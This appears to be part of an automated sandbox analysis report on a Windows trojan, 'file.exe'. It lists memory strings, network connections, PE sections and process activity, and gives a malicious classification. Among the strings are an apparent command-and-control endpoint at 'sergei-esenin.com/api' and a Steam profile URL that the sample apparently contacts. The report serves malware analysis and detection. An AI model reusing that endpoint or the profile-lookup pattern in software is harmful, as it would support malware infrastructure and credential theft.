Source: file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072962019.00000000010C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.4.dr	String found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: file.exe, 00000000.00000003.2073053399.0000000001105000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic
Source: file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072962019.00000000010C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
Source: file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072962019.00000000010C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072962019.00000000010C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072962019.00000000010C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
Source: file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072962019.00000000010C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
Source: file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/sh
Source: file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/share
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: file.exe, 00000000.00000003.2073053399.0000000001105000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079771771.00000000010FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/
Source: file.exe, 00000000.00000003.2079771771.00000000010FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/api
Source: file.exe, 00000000.00000003.2073053399.0000000001105000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079771771.00000000010FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/api6
Source: file.exe, 00000000.00000002.2249500388.00000000010F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/apiU
Source: file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/e.E:
Source: file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/em
Source: file.exe, 00000000.00000002.2249500388.00000000010F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/pi
Source: file.exe, 00000000.00000002.2249500388.00000000010F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com:443/api
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.c5:
Source: file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: file.exe, 00000000.00000003.2072962019.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/I
Source: file.exe, 00000000.00000003.2072962019.00000000010F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2249500388.00000000010F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079771771.00000000010FC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073078015.00000000010FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/d
Source: file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: file.exe, 00000000.00000003.2072962019.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072962019.00000000010C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: file.exe, 00000000.00000003.2072962019.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/765611997243319009
Source: file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: file.exe, 00000000.00000003.2073053399.0000000001105000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
Source: file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: file.exe, 00000000.00000003.2072914440.000000000113F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_r
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_ag
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/u:
Source: file.exe, 00000000.00000002.2249500388.00000000010F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com
Source: file.exe, 00000000.00000003.2079771771.00000000010FC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079755763.000000000113B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: file.exe, 00000000.00000002.2249500388.00000000010F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079771771.00000000010FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: file.exe, 00000000.00000003.2079720283.000000000114C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072878197.0000000001145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: file.exe, 00000000.00000003.2073091468.000000000113A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49706 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00910228	0_2_00910228
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0093E8A0	0_2_0093E8A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0094A0D0	0_2_0094A0D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00912030	0_2_00912030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090A850	0_2_0090A850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090E1A0	0_2_0090E1A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00905160	0_2_00905160
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00944A40	0_2_00944A40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090A300	0_2_0090A300
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091049B	0_2_0091049B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00914487	0_2_00914487
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00907CA4	0_2_00907CA4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0092CCD0	0_2_0092CCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0092C470	0_2_0092C470
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00908590	0_2_00908590
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009035B0	0_2_009035B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091C5F0	0_2_0091C5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0092FD10	0_2_0092FD10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090BEB0	0_2_0090BEB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00916EBF	0_2_00916EBF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090AF10	0_2_0090AF10

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 0091D300 appears 47 times

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 1992

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: ZLIB complexity 0.9995552289603961

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/9@10/2

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5040

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\edcab02f-0fb5-4804-83ed-3f608b24c352

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

Virustotal: Detection: 41%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 1992
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 1972

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
